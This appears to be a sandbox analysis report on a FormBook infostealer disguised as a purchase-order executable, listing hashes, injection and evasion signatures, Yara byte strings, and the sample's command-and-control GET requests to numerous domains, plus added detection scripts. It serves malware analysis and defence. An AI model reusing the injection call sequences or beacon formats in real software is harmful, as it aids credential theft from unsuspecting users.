
Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321097
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match
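
The injection-related signatures above (maps memory into another process, modifies a thread context, queues an APC, process hollowing, creates a process in suspended mode) are all inferred from the order in which the sample calls Native API functions. The following is an added example, not Joe Sandbox code, of how a tracer's API log can be turned into the same technique names: each technique is an ordered subsequence of cross-process calls from one source PID against one target PID. The step lists, the `Call` record and the trace itself are assumptions of this example; the trace is constructed to mirror the process chain in this report (the sample hollows a second copy of itself, which then plants code in explorer.exe), and which technique reaches explorer.exe is assumed for illustration, since the report lists only the APIs involved.

```python
"""Classify cross-process injection from an ordered NT API trace.

Added example; not Joe Sandbox code. A real tracer must resolve each handle
argument to its target process; here the target pid is given directly.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Call:
    pid: int                      # calling process
    api: str                      # NT API name as logged
    target: Optional[int] = None  # process the handle argument refers to


# Ordered call patterns per technique (assumed step lists, chosen to match the
# API names reported for this sample). Every step must occur, in this order,
# from one source pid against one target pid; unrelated calls may interleave.
TECHNIQUES: Dict[str, List[str]] = {
    "process hollowing": [
        "NtCreateProcessEx",        # child created suspended
        "NtUnmapViewOfSection",     # original image evicted
        "NtAllocateVirtualMemory",
        "NtWriteVirtualMemory",     # payload written in its place
        "NtSetContextThread",       # entry point redirected
        "NtResumeThread",
    ],
    "APC injection": [
        "NtAllocateVirtualMemory",
        "NtWriteVirtualMemory",
        "NtQueueApcThread",         # payload runs when the target thread alerts
    ],
    "thread context hijack": [
        "NtSuspendThread",
        "NtGetContextThread",
        "NtSetContextThread",
        "NtResumeThread",
    ],
}


def _is_ordered_subsequence(calls: List[Call], pattern: List[str]) -> bool:
    """True when every API in `pattern` appears in `calls` in that order."""
    it = iter(calls)
    return all(any(c.api == step for c in it) for step in pattern)


def classify(trace: Iterable[Call]) -> Dict[Tuple[int, int], List[str]]:
    """Group cross-process calls by (source, target) and name every technique
    whose full ordered pattern that pair exhibits."""
    by_pair: Dict[Tuple[int, int], List[Call]] = {}
    for call in trace:
        if call.target is not None and call.target != call.pid:
            by_pair.setdefault((call.pid, call.target), []).append(call)
    hits: Dict[Tuple[int, int], List[str]] = {}
    for pair, calls in by_pair.items():
        found = [name for name, pat in TECHNIQUES.items()
                 if _is_ordered_subsequence(calls, pat)]
        if found:
            hits[pair] = found
    return hits


# Constructed trace modelled on this report's process chain: the first sample
# instance (5468) hollows a second copy of itself (4392), which then plants
# code in explorer.exe (3292). The APC route into explorer.exe is assumed.
TRACE = [
    Call(5468, "NtCreateProcessEx", 4392),
    Call(5468, "NtQuerySystemInformation"),       # unrelated, interleaved
    Call(5468, "NtUnmapViewOfSection", 4392),
    Call(5468, "NtAllocateVirtualMemory", 4392),
    Call(5468, "NtWriteVirtualMemory", 4392),
    Call(5468, "NtWriteVirtualMemory", 4392),
    Call(5468, "NtSetContextThread", 4392),
    Call(5468, "NtResumeThread", 4392),
    Call(4392, "NtAllocateVirtualMemory", 3292),
    Call(4392, "NtWriteVirtualMemory", 3292),
    Call(4392, "NtQueueApcThread", 3292),
    Call(3292, "NtReadFile"),                     # explorer's own activity
]

if __name__ == "__main__":
    for (src, dst), names in classify(TRACE).items():
        print(f"{src} -> {dst}: {', '.join(names)}")
```

The subsequence check deliberately ignores interleaved calls, so the `NtQuerySystemInformation` between the process creation and the unmap does not break the match; a pattern whose steps occur out of order (for instance a write before the allocation) does not fire.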

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
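
The startup tree is the most compact evidence on this page: the sample re-launches its own image (hollowing), explorer.exe appears beneath that second instance (the report draws a process that received injected code as a child of the injector, so this is the injection relationship, not a true parent), ipconfig.exe then "spawns" cmd.exe even though ipconfig never creates children, and that cmd.exe deletes the original file. The following added example, not Joe Sandbox code, parses the tree exactly as printed above and derives those four findings; `NO_CHILD_UTILITIES` is an assumed list that an analyst would extend for their environment.

```python
"""Parse a Joe Sandbox-style startup tree and flag injection and cleanup
relationships. Added example; not Joe Sandbox code. STARTUP is the tree as
printed in this report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

STARTUP = r"""
  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
"""

# One tree line: indentation (two spaces per level), bullet, image name, then
# "(PID: n cmdline: ... MD5: hex)". Lines without a PID are skipped.
NODE = re.compile(
    r"^(?P<indent>\s*)• (?P<image>.+?) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*?)\s*MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    md5: str
    parent: Optional["Proc"] = None
    children: List["Proc"] = field(default_factory=list)


def parse_tree(text: str) -> List[Proc]:
    """Processes in document order, parent links rebuilt from indentation."""
    procs: List[Proc] = []
    stack: List[tuple] = []          # (depth, Proc) of the current ancestry
    for line in text.splitlines():
        m = NODE.match(line)
        if not m:
            continue
        depth = len(m["indent"]) // 2
        proc = Proc(int(m["pid"]), m["image"], m["cmd"], m["md5"].lower())
        while stack and stack[-1][0] >= depth:
            stack.pop()
        if stack:
            proc.parent = stack[-1][1]
            proc.parent.children.append(proc)
        stack.append((depth, proc))
        procs.append(proc)
    return procs


# Utilities that never create child processes on their own; a child under one
# of them means foreign code runs inside it. Assumed list; extend as needed.
NO_CHILD_UTILITIES = {"ipconfig.exe"}


def findings(procs: List[Proc], sample_path: str) -> List[str]:
    out: List[str] = []
    for p in procs:
        par = p.parent
        if par and par.image.lower() == p.image.lower():
            out.append(f"{p.pid}: second instance of its own image under {par.pid}; process hollowing candidate")
        if p.image.lower() == "explorer.exe" and par is not None:
            out.append(f"{p.pid}: explorer.exe placed under {par.image} ({par.pid}); injection target")
        if par and par.image.lower() in NO_CHILD_UTILITIES:
            out.append(f"{p.pid}: {p.image} spawned by {par.image} ({par.pid}), which never spawns children; injected code")
        if p.image.lower() == "cmd.exe" and re.search(r"\bdel\b", p.cmdline, re.I) \
                and sample_path.lower() in p.cmdline.lower():
            out.append(f"{p.pid}: cmd.exe deletes the original sample; self-cleanup")
    return out


if __name__ == "__main__":
    tree = parse_tree(STARTUP)
    root_path = tree[0].cmdline.strip("'")   # the sample's on-disk path, from the root node
    for line in findings(tree, root_path):
        print(line)
```

The same four rules map directly onto endpoint telemetry (Sysmon event 1 for the parent/child pairs, event 8 or 10 for the injection into explorer.exe), with the caveat that a real parent/child log will show ipconfig.exe's parent as explorer.exe and the sample nowhere near it, which is exactly why the hollowing and injection steps need their own detections.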

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings (listed under each row)
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16089:$sqlite3step: 68 34 1C 7B E1
  • 0x1619c:$sqlite3step: 68 34 1C 7B E1
  • 0x160b8:$sqlite3text: 68 38 2A 90 C5
  • 0x161dd:$sqlite3text: 68 38 2A 90 C5
  • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries; the remaining entries are not reproduced here)

Unpacked PEs

Source | Rule | Description | Author | Strings (listed under each row)
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16089:$sqlite3step: 68 34 1C 7B E1
  • 0x1619c:$sqlite3step: 68 34 1C 7B E1
  • 0x160b8:$sqlite3text: 68 38 2A 90 C5
  • 0x161dd:$sqlite3text: 68 38 2A 90 C5
  • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 entries; the remaining entries are not reproduced here)
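
Two things in the Yara tables are worth checking by hand rather than trusting the labels. First, the yara-signator string `$sequence_0` (03 C8 0F 31 2B C1 89 45 FC) decodes to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, which is the RDTSC timing loop behind the "Tries to detect virtualization through RDTSC time measurements" signature, and the JPCERT/CC strings are each a `push imm32` (opcode 68) of a constant that the rule's string names tie to FormBook's sqlite3 usage. Second, every string sits 0xE00 bytes further into the `.raw.unpack` dump than into the rebuilt `.unpack` PE, which is consistent with the same code being viewed at its memory alignment versus its file alignment. The following added example, not Joe Sandbox, yara-signator or JPCERT/CC code, re-runs those strings as a plain byte scanner over a constructed, zero-filled dump in which each sequence is written at the offset the report gives, and verifies the constant shift. The rule conditions (`7 of them` for the signator rule, all three for the JPCERT rule) are assumptions; the page does not reproduce the rules' condition blocks.

```python
"""Re-run the Yara string matches listed above against a memory dump.

Added example; not Joe Sandbox, yara-signator or JPCERT/CC code. Sequences
and offsets are copied from the report; the dump is constructed.
"""
from typing import Dict, List

# yara-signator sequences (Formbook_1). $sequence_0 is
# add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax (RDTSC timing check).
SIGNATOR = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# JPCERT/CC strings: each is `push imm32` (opcode 68), e.g. push 0xE17B1C34.
JPCERT = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
# First reported offset of each signator string in the raw dump and in the
# rebuilt PE, plus the remaining reported offsets for the raw dump.
RAW_OFFSETS = {"$sequence_0": 0x83d8, "$sequence_1": 0x14085, "$sequence_2": 0x13b71,
               "$sequence_3": 0x14187, "$sequence_4": 0x142ff, "$sequence_5": 0x917a,
               "$sequence_6": 0x12dec, "$sequence_7": 0x9ef2, "$sequence_8": 0x19167,
               "$sequence_9": 0x1a1da}
UNPACK_OFFSETS = {"$sequence_0": 0x75d8, "$sequence_1": 0x13285, "$sequence_2": 0x12d71,
                  "$sequence_3": 0x13387, "$sequence_4": 0x134ff, "$sequence_5": 0x837a,
                  "$sequence_6": 0x11fec, "$sequence_7": 0x90f2, "$sequence_8": 0x18367,
                  "$sequence_9": 0x193da}
EXTRA_RAW = {"$sequence_0": [0x8772], "$sqlite3step": [0x16089, 0x1619c],
             "$sqlite3text": [0x160b8, 0x161dd], "$sqlite3blob": [0x160cb, 0x161f3]}


def hex_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def scan(buf: bytes, strings: Dict[str, str]) -> Dict[str, List[int]]:
    """Every offset of every string, like yara's per-string match list."""
    hits: Dict[str, List[int]] = {}
    for name, hexs in strings.items():
        pat, offs, i = hex_bytes(hexs), [], -1
        while (i := buf.find(pat, i + 1)) != -1:
            offs.append(i)
        hits[name] = offs
    return hits


def rule_fires(hits: Dict[str, List[int]], minimum: int) -> bool:
    """Condition: at least `minimum` distinct strings matched (assumed)."""
    return sum(1 for offs in hits.values() if offs) >= minimum


def alignment_delta(a: Dict[str, int], b: Dict[str, int]) -> int:
    """If two listings describe the same code, each string's offset must be
    shifted by one constant; return it, or fail if the shift varies."""
    deltas = {a[k] - b[k] for k in a}
    if len(deltas) != 1:
        raise ValueError(f"offset shift is not constant: {sorted(deltas)}")
    return deltas.pop()


def build_dump() -> bytes:
    """Constructed dump: sequences written at their reported raw offsets."""
    buf = bytearray(0x1B000)
    for name, off in RAW_OFFSETS.items():
        pat = hex_bytes(SIGNATOR[name])
        buf[off:off + len(pat)] = pat
    for name, offs in EXTRA_RAW.items():
        pat = hex_bytes(SIGNATOR.get(name) or JPCERT[name])
        for off in offs:
            buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    dump = build_dump()
    print("Formbook_1 fires:", rule_fires(scan(dump, SIGNATOR), 7))
    print("JPCERT rule fires:", rule_fires(scan(dump, JPCERT), 3))
    print("raw vs unpack shift:", hex(alignment_delta(RAW_OFFSETS, UNPACK_OFFSETS)))
```

To run the same check on a real dump, replace `build_dump()` with `open(path, "rb").read()`; the scanner is deliberately a substring search rather than a Yara binding so the offsets it prints can be compared one-to-one with the report's tables.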

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Purchase Order 40,7045$.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe | Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.maninhatphoto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.placeduconfort.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.heartandcrowncloset.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.fahufu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1 | Host: www.the-gongs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.shopnicknaks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.sweetbasilmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.justsoldbykristen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1 | Host: www.ariasu-nakanokaikei.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1 | Host: www.realitytvstockwatch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.searchnehomes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1 | Host: www.happinestbuilders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.hemparcade.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | IP Address: 185.201.11.126
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: DEDIPATH-LLCUS
Source: Joe Sandbox View | ASN Name: AS-HOSTINGERLT
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.maninhatphoto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.placeduconfort.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.heartandcrowncloset.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.fahufu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
